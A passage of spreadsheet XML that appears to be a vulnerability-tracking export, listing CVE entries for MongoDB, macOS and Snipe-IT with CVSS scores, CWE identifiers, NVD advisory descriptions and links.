      <c r="N742" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O742" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P742" s="5" t="inlineStr"/>
      <c r="Q742" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R742" s="5" t="inlineStr">
        <is>
          <t>The $regexFindAll expression can be used by an authenticated user who can run aggregation pipeline stages to crash a MongoDB server (mongod). Under certain specific conditions the  regex match can start in the middle of a multi-code-unit character, triggering an assertion during query execution.</t>
        </is>
      </c>
      <c r="S742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B743" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82054</t>
        </is>
      </c>
      <c r="D743" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E743" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F743" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G743" s="5" t="inlineStr"/>
      <c r="H743" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I743" s="5" t="inlineStr"/>
      <c r="J743" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K743" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L743" s="5" t="inlineStr"/>
      <c r="M743" s="5" t="inlineStr"/>
      <c r="N743" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O743" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P743" s="5" t="inlineStr"/>
      <c r="Q743" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R743" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB server's JSON Pointer parser used during $jsonSchema query filter processing. When a find command includes a specially crafted $jsonSchema filter field, the parser processes the input without enforcing adequate limits on iteration count or total allocation size, resulting in significant memory amplification. Under concurrent request load, the cumulative memory consumption can exhaust available heap memory, causing the server's out-of-memory handler to terminate the mongod process and deny service to all connected clients.</t>
        </is>
      </c>
      <c r="S743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B744" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82055</t>
        </is>
      </c>
      <c r="D744" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E744" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F744" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G744" s="5" t="inlineStr"/>
      <c r="H744" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I744" s="5" t="inlineStr"/>
      <c r="J744" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K744" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L744" s="5" t="inlineStr"/>
      <c r="M744" s="5" t="inlineStr"/>
      <c r="N744" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O744" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P744" s="5" t="inlineStr"/>
      <c r="Q744" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R744" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB's 2dsphere index key generation that can cause a server crash due to a null pointer dereference. When a specially crafted GeoJSON document is inserted into a collection with a 2dsphere index, an inconsistency in geometry parsing can leave an internal object in an invalid, partially initialized state. During subsequent index key generation, access to this improperly initialized object results in a null pointer dereference that terminates the mongod process. An authenticated user with write access can use this to cause a denial of service.</t>
        </is>
      </c>
      <c r="S744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B745" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82057</t>
        </is>
      </c>
      <c r="D745" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E745" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F745" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G745" s="5" t="inlineStr"/>
      <c r="H745" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I745" s="5" t="inlineStr"/>
      <c r="J745" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K745" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L745" s="5" t="inlineStr"/>
      <c r="M745" s="5" t="inlineStr"/>
      <c r="N745" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O745" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P745" s="5" t="inlineStr"/>
      <c r="Q745" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R745" s="5" t="inlineStr">
        <is>
          <t>A security issue was discovered in MongoDB where an authenticated user with readWrite privileges could crash the mongod server process. By specifying a custom WiredTiger storage configuration option with an incompatible value during collection creation, a user could cause a type confusion in the storage engine layer. When documents were subsequently read from the misconfigured collection, the resulting mismatch in expected data format led to corrupted memory interpretation and a server crash. The crafted collection configuration persists across restarts, requiring manual operator intervention to remediate.</t>
        </is>
      </c>
      <c r="S745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B746" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82058</t>
        </is>
      </c>
      <c r="D746" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E746" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F746" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G746" s="5" t="inlineStr"/>
      <c r="H746" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I746" s="5" t="inlineStr"/>
      <c r="J746" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K746" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L746" s="5" t="inlineStr"/>
      <c r="M746" s="5" t="inlineStr"/>
      <c r="N746" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O746" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P746" s="5" t="inlineStr"/>
      <c r="Q746" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R746" s="5" t="inlineStr">
        <is>
          <t>A flaw in MongoDB's JSON Schema validation error generation code allows an authenticated user with readWrite privileges to crash the mongod server. When a BSON document containing an array with a malformed numeric field name fails a $jsonSchema items type constraint, the error generation path performs unsafe numeric conversion on the user-controlled field name without proper exception handling, resulting in an uncaught exception that terminates the server process. This is possible because incoming wire protocol BSON validation does not enforce that array element field names are valid, in-range numeric indices.</t>
        </is>
      </c>
      <c r="S746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B747" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82065</t>
        </is>
      </c>
      <c r="D747" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E747" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F747" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G747" s="5" t="inlineStr"/>
      <c r="H747" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I747" s="5" t="inlineStr"/>
      <c r="J747" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K747" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L747" s="5" t="inlineStr"/>
      <c r="M747" s="5" t="inlineStr"/>
      <c r="N747" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O747" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P747" s="5" t="inlineStr"/>
      <c r="Q747" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R747" s="5" t="inlineStr">
        <is>
          <t>A security issue in the MongoDB Server's storage engine integration layer allows an authenticated user with collection creation privileges to cause a persistent denial of service. Insufficient validation of user-supplied storage configuration options permits values that, once persisted to durable metadata, trigger a fatal assertion failure when the metadata is subsequently read by diagnostic operations. The corrupted metadata persists across server restarts and is replicated to other cluster members, requiring manual operator intervention to restore service.</t>
        </is>
      </c>
      <c r="S747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B748" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82068</t>
        </is>
      </c>
      <c r="D748" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E748" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F748" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G748" s="5" t="inlineStr"/>
      <c r="H748" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I748" s="5" t="inlineStr"/>
      <c r="J748" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K748" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L748" s="5" t="inlineStr"/>
      <c r="M748" s="5" t="inlineStr"/>
      <c r="N748" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O748" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P748" s="5" t="inlineStr"/>
      <c r="Q748" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R748" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an authenticated user with write privileges to trigger a persistent fatal assertion crash by sending specially crafted retryable write commands. The crash state is durably persisted, causing the server process to repeatedly crash on restart and potentially propagating to additional nodes in a sharded cluster. Manual intervention is required to restore service availability.</t>
        </is>
      </c>
      <c r="S748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B749" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82070</t>
        </is>
      </c>
      <c r="D749" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E749" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F749" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G749" s="5" t="inlineStr"/>
      <c r="H749" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I749" s="5" t="inlineStr"/>
      <c r="J749" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K749" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L749" s="5" t="inlineStr"/>
      <c r="M749" s="5" t="inlineStr"/>
      <c r="N749" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O749" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P749" s="5" t="inlineStr"/>
      <c r="Q749" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R749" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server's diagnostic reporting interface allows an authenticated user with monitoring privileges to access insufficiently protected credentials from concurrent administrative operations. The same credentials are properly redacted in server log output, but the diagnostic interface omits equivalent redaction. Successful exploitation requires a valid authenticated session with monitoring-level permissions and results in exposure of cleartext credentials that could enable impersonation of other users, including privileged accounts.</t>
        </is>
      </c>
      <c r="S749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B750" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82073</t>
        </is>
      </c>
      <c r="D750" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E750" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F750" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G750" s="5" t="inlineStr"/>
      <c r="H750" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I750" s="5" t="inlineStr"/>
      <c r="J750" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K750" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L750" s="5" t="inlineStr"/>
      <c r="M750" s="5" t="inlineStr"/>
      <c r="N750" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O750" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P750" s="5" t="inlineStr"/>
      <c r="Q750" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R750" s="5" t="inlineStr">
        <is>
          <t>A security issue in the MongoDB Server aggregation framework allows an authenticated user with limited read privileges to bypass view-level authorization checks and access data from unauthorized collections when Atlas Search features are in use. The issue stems from insufficient validation of an internal command parameter that can be set by external clients, causing a security check to be improperly skipped.</t>
        </is>
      </c>
      <c r="S750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B751" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82074</t>
        </is>
      </c>
      <c r="D751" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E751" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F751" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G751" s="5" t="inlineStr"/>
      <c r="H751" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I751" s="5" t="inlineStr"/>
      <c r="J751" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K751" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L751" s="5" t="inlineStr"/>
      <c r="M751" s="5" t="inlineStr"/>
      <c r="N751" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O751" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P751" s="5" t="inlineStr"/>
      <c r="Q751" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R751" s="5" t="inlineStr">
        <is>
          <t>MongoDB Server contains an incorrect authorization vulnerability in the aggregation framework. An authenticated user with minimal privileges can craft a specially formatted aggregation request that causes the server's authorization subsystem to evaluate a different operation than what is actually executed, resulting in unauthorized read access to collection data within the target database.</t>
        </is>
      </c>
      <c r="S751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B752" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84548</t>
        </is>
      </c>
      <c r="D752" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E752" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F752" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G752" s="5" t="inlineStr"/>
      <c r="H752" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I752" s="5" t="inlineStr"/>
      <c r="J752" s="5" t="inlineStr"/>
      <c r="K752" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L752" s="5" t="inlineStr"/>
      <c r="M752" s="5" t="inlineStr"/>
      <c r="N752" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O752" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P752" s="5" t="inlineStr"/>
      <c r="Q752" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R752" s="5" t="inlineStr">
        <is>
          <t>An integer overflow was addressed with improved input validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Processing a maliciously crafted document may lead to an out-of-bounds read.</t>
        </is>
      </c>
      <c r="S752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84548</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B753" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84565</t>
        </is>
      </c>
      <c r="D753" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E753" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F753" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G753" s="5" t="inlineStr"/>
      <c r="H753" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I753" s="5" t="inlineStr"/>
      <c r="J753" s="5" t="inlineStr"/>
      <c r="K753" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L753" s="5" t="inlineStr"/>
      <c r="M753" s="5" t="inlineStr"/>
      <c r="N753" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O753" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P753" s="5" t="inlineStr"/>
      <c r="Q753" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R753" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Processing a maliciously crafted disk image may lead to unexpected app termination.</t>
        </is>
      </c>
      <c r="S753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84565</t>
        </is>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B754" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86757</t>
        </is>
      </c>
      <c r="D754" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E754" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F754" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G754" s="5" t="inlineStr"/>
      <c r="H754" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I754" s="5" t="inlineStr"/>
      <c r="J754" s="5" t="inlineStr"/>
      <c r="K754" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L754" s="5" t="inlineStr"/>
      <c r="M754" s="5" t="inlineStr"/>
      <c r="N754" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O754" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P754" s="5" t="inlineStr"/>
      <c r="Q754" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R754" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly gate access to encrypted custom-field values in asset form templates for listbox, textarea, markdown-textarea, and date/datetime picker elements. Authenticated users with assets.edit, assets.checkin, assets.checkout, or assets.audit permissions can read plaintext encrypted custom field values by opening asset forms, bypassing the assets.view.encrypted_custom_fields permission check.</t>
        </is>
      </c>
      <c r="S754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86757</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B755" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86758</t>
        </is>
      </c>
      <c r="D755" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E755" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F755" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G755" s="5" t="inlineStr"/>
      <c r="H755" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I755" s="5" t="inlineStr"/>
      <c r="J755" s="5" t="inlineStr"/>
      <c r="K755" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L755" s="5" t="inlineStr"/>
      <c r="M755" s="5" t="inlineStr"/>
      <c r="N755" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O755" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P755" s="5" t="inlineStr"/>
      <c r="Q755" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="R755" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly enforce the viewKeys authorization gate in CSV export and API index endpoints, allowing authenticated users with only licenses.view permission to access product keys. Attackers can download all license keys in bulk via CSV export or validate candidate keys through API response discrepancies without needing the viewKeys permission.</t>
        </is>
      </c>
      <c r="S755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86758</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B756" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86759</t>
        </is>
      </c>
      <c r="D756" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E756" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F756" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G756" s="5" t="inlineStr"/>
      <c r="H756" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I756" s="5" t="inlineStr"/>
      <c r="J756" s="5" t="inlineStr"/>
      <c r="K756" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L756" s="5" t="inlineStr"/>
      <c r="M756" s="5" t="inlineStr"/>
      <c r="N756" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O756" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P756" s="5" t="inlineStr"/>
      <c r="Q756" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R756" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to authorize the POST /hardware/history endpoint, allowing any authenticated user to reassign arbitrary assets and modify audit logs. Attackers can submit a CSV file to reassign assets across companies and inject fraudulent audit trail entries, compromising inventory integrity and accountability.</t>
        </is>
      </c>
      <c r="S756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86759</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B757" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86765</t>
        </is>
      </c>
      <c r="D757" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E757" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F757" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G757" s="5" t="inlineStr"/>
      <c r="H757" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I757" s="5" t="inlineStr"/>
      <c r="J757" s="5" t="inlineStr"/>
      <c r="K757" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L757" s="5" t="inlineStr"/>
      <c r="M757" s="5" t="inlineStr"/>
      <c r="N757" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O757" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P757" s="5" t="inlineStr"/>
      <c r="Q757" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R757" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to enforce checkout authorization when assignment fields are submitted to the asset update endpoint. Authenticated users with edit permission but explicitly denied checkout permission can reassign assets, bypass check-in procedures, and alter custody records by submitting assigned_user, assigned_asset, or assigned_location parameters to PATCH /api/v1/hardware/{id}.</t>
        </is>
      </c>
      <c r="S757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86765</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B758" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86766</t>
        </is>
      </c>
      <c r="D758" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E758" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F758" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G758" s="5" t="inlineStr"/>
      <c r="H758" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I758" s="5" t="inlineStr"/>
      <c r="J758" s="5" t="inlineStr"/>
      <c r="K758" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L758" s="5" t="inlineStr"/>
      <c r="M758" s="5" t="inlineStr"/>
      <c r="N758" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
